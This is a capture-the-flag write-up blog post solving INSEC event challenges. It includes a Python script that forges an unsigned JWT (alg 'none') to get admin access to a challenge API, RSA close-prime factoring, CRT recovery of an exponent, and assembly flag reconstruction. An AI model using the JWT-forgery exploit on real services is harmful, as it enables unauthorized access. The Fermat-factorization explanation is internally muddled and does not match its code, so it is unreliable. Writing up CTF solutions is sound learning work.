Cybersecurity Day CTF

738 words

4 minutes

Cybersecurity Day CTF

2024-11-12

CTF

CSD

/

INSEC

/

CTF

First, I’d like to thank the organizers, INSEC and Cyberforces, for putting together this amazing event. Your hard work and dedication made it possible for us to challenge ourselves, learn, and grow. I appreciate the opportunity to participate, and I’m grateful for all the effort that went into making this CTF even we didn’t make it to the top 5.

Web#

Apisa#

It was fun challenge i got the first blood on it

so let’s start with searching for potentiel vulnerbilities

JWT Token Vulnerabilities:
- The code accepts alg: none in the JWT header
- There are specific header requirements that we can satisfy:
  - typ must contain “Why do pirates use HMAC?”
  - alg can be ‘none’
  - kid must split into [“What’s”, “a”, “pirate’s”, “favorite”, “hash?”]
Token Verification:
- The timestamp verification has a specific XOR condition
- The code will accept tokens with no signature if the algorithm is set to ‘none’
Request Requirements:
- Needs specific headers: X-Request-Timestamp, X-API-Version, X-Content-Hash
- The body must contain specific fields to get the flag:
  - action: “read”
  - resource: “document”
  - options.type: “admin”

so we need to :

Creates a forged JWT token with ‘none’ algorithm and required headers
Sets up the proper request body to retrieve the flag
Calculates the correct content hash
Sends the request with all required headers

Taking all this informations we can

1
import requests
2
import jwt
3
import json
4
import time
5
import base64
6
import hashlib
7

8
BASE_URL = "https://apisa.snakeeyes-blogs.xyz"
9

10
def create_forged_token():
11
    # Crafting the JWT header with required fields based on treasure_map conditions
12
    header = {
13
        'typ': 'Why do pirates use HMAC?',
14
        'alg': 'none',
15
        'kid': "What's a pirate's favorite hash?"
16
    }
17
    timestamp = str(int(time.time()))
18
    payload = {
19
        'role': 'admin',
20
        'timestamp': timestamp
21
    }
22
    token = jwt.encode(payload, None, algorithm='none', headers=header)
23
    return token, timestamp
24

25
def create_request_body():
26
    body = {
27
        'action': 'read',
28
        'resource': 'document',
29
        'options': {
30
            'type': 'admin'
31
        }
32
    }
33
    return body
34

35
def exploit():
36
    token, timestamp = create_forged_token()
37
    body = create_request_body()
38
    body_hash = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
39

40
    # Prepare headers
41
    headers = {
42
        'Authorization': f'Bearer {token}',
43
        'X-Request-Timestamp': timestamp,
44
        'X-API-Version': '1.0',
45
        'X-Content-Hash': body_hash,
46
        'Content-Type': 'application/json'
47
    }
48

49
    response = requests.post(f"{BASE_URL}/api/request", json=body, headers=headers)
50

51
    print(f"Response status: {response.status_code}")
52
    print(f"Response body: {response.json()}")
53

54
if __name__ == "__main__":
55
    exploit()

Crypto#

Primable#

This RSA challenge provides us with ( n ), the ciphertext, and ( e ). We need to determine the values of ( p ) and ( q ), which are close to each other.

We can use Fermat’s factorization method:

Given ( n = p * q ), we know:

n = \left( \frac{p+q}{2} \right)^2 - \left( \frac{p-q}{2} \right)^2

Since ( p ) and ( q ) are close, we define:

$\left( s = \frac{p+q}{2} \right)$ and $\left( t = \frac{p-q}{2} \right)$

So,

n = s^2 - t^2

We can start with an approximation:

Begin with $t = \sqrt{n}$ .
Increment ( t ) until we find that ( t ) is a prime number.
Then, calculate $s^2 = t^2 - n$ to see if it’s a perfect square.

Finally, we retrieve p and q :

p = t + s, \quad q = t - s

1
from Crypto.Util.number import isPrime, long_to_bytes
2
import gmpy2
3

4
def find_close_prime_bits(n):
5
    nlen = n.bit_length()
6
    approx_p = gmpy2.isqrt(n)
7
    p_candidate = approx_p
8
    step = 2**499
9

10
    while True:
11
        if n % p_candidate == 0:
12
            q_candidate = n // p_candidate
13
            if isPrime(p_candidate) and isPrime(q_candidate):
14
                return p_candidate, q_candidate
15
        p_candidate -= 1
16
        if p_candidate < approx_p - 10000:
17
            return None, None
18

19
n = 27648324383538704058526126064664874691917638403593991242489099137877576182768193643164934381927043193856407292824729622322951353990162721990529414343175377852857689274876201528662203124227485748672303062548126194441400835928481251587783134278074665746682970354712955578800278168532406775145550549727181618513338094567283014138173235068565828630064627353801520155836164622254499802383985552509948534078768150613256802530977549344858089086996803357098914388837521106054470532422789702875346806977904108902499915266266843564027887867480322537174346831594998659778047946239498558452563855743282753795196712406941340754551
20
e = 65537
21
c = 9013202925065684070284841096480034269882027628943152855208546857010316985176266380397714875901900820872886282115581264047981875170433324913458226606527330409663329601662960933836912615694949924944870804124552068592191193943526880632558626966094512796349832518345976496505072320957237056737176454945433149265875627762284702122475079751393161965729384333290123132213399055830217995916760986963211627560382329645027957377120781321163281732645494865537740896992456565056475865865221936753646422406435059365634542991935340719834134651261396813436686353015517906742263356658539068832228410725229853185341484070961072296856
22

23
p, q = find_close_prime_bits(n)
24
print(f"Found p: {p}")
25
print(f"Found q: {q}")
26

27
if p and q:
28
    phi = (p - 1) * (q - 1)
29
    d = pow(e, -1, phi)
30
    m = pow(c, d, n)
31
    try:
32
        flag = long_to_bytes(m).decode()
33
        print(f"Flag: {flag}")
34
    except:
35
        print("Error decoding message")
36
else:
37
    print("Failed to find prime factors")

Chinesse (i dont remember the name XD)#

solving the challenge using seed 2000 because its the length of hint table we need to get e using Chinesse Reminder theoreme

1
from sympy.ntheory.modular import crt
2

3
ll = []  # list of random integers generated with the given seed (2000)
4
hints =  []  # the hints provided, each hint[i] = e % ll[i]
5

6
e, _ = crt(ll, hints)
7
print(f"e = {e}")

now after we have N, C et e we can use dcode to solve the challenge

Rev#

asm#

We have assembly chall so we need to follow what the script do to get the flag

1
import struct
2

3
flag = bytearray("INSEC{".encode() + b'\x00' * 12 + b'}\x00')
4

5
value1 = 1870225259  # 0x6FA16FEB
6
flag[6:10] = struct.pack('<I', value1)
7

8
value2 = 3738091242  # 0xDEE0C24A
9
rotated_value2 = ((value2 >> 1) | (value2 << 31)) & 0xFFFFFFFF  # Rotate right by 1
10
flag[10:14] = struct.pack('<I', rotated_value2)
11

12
value3 = 2342557323  # 0x8B9E52DB
13
flipped_value3 = value3 ^ 0xFFFFFFFF  # XOR with 0xFFFFFFFF
14
bswapped_value3 = struct.unpack("<I", struct.pack(">I", flipped_value3))[0]  # Byte-swap
15
flag[14:18] = struct.pack('<I', bswapped_value3)
16

17
final_flag = flag.decode('latin1')
18
print("Flag:", final_flag)